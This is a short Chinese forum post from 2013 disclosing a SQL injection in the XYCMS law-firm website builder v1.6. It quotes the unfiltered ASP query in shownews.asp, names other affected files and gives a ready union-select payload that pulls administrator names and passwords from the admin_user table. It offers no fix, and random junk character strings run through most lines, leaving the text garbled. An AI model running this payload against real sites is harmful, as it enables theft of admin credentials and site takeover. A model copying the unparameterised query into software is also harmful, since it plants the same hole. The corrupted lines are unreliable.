前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
7 k3 n R& ^" s7 \2 W9 g
9 ] J7 e* u1 B) M淫荡分割线
$ D& @" j! P2 t& a' c3 l2 W--------------------------------------------------------
" M7 e/ x; J4 ?
; l4 `5 Z, |! f9 B8 j8 x审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)# Z! k& F3 R# E& a1 m
源码地址:http://down.chinaz.com/soft/29233.htm; E* |$ u! r4 m7 H* Z; d2 F( d
2 z7 I, \. F; f$ m* ]9 [' J m漏洞文件:shownews.asp
& r# l6 }! M O, l6 v/ P漏洞代码:7-13行
Q3 ]& ^* F0 x/ G, z 9 o) M$ L" z+ h/ f% X
- a' `: i. E7 a& V
<%
2 m, M+ g, l- \( d2 _0 Q* Xid=request.QueryString("id")
+ m! A1 b" a0 j/ | , S5 T& O: C) [; {5 Z& ?) y r
set snews=server.createobject("adodb.recordset") ) }# R' x, O/ s) b# \
exec="select * from [news] where id="&id
4 X6 @2 S8 B# p8 J# q& m" ]; \+ r c7 Ksnews.open exec,conn,1,1" w ?2 U* U6 D: } o6 F" x7 L+ l
%>
9 f$ r7 c; N" _1 I( y0 W
) s0 `3 a/ r$ y0 F 1 e2 g/ Z5 F3 {/ A' l3 L* u
什么过滤都没有 直造成注入5 O) v, j. q" [1 Y( {
* p! e0 p" i. v! q2 p注入点:http://127.0.0.1:99/shownews.asp?id=xx
6 x. G% F: j3 d4 h0 i2 l" l
) f* G8 U5 ?% i- o$ M. L; P+ L m其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找$ {* H0 L% P& M8 b1 u y
1 ~5 N4 ~% ~7 U' x! L/ H
- H; C/ P2 Z5 q8 ?$ x bexp: union select 1,admin,password,4,5,7 from admin_user4 G" F& ` }5 |9 o5 {% O' J
; g8 q: Z) v; [& H+ P' t
|
发表于 2013-4-4 17:28:12
收藏
支持
反对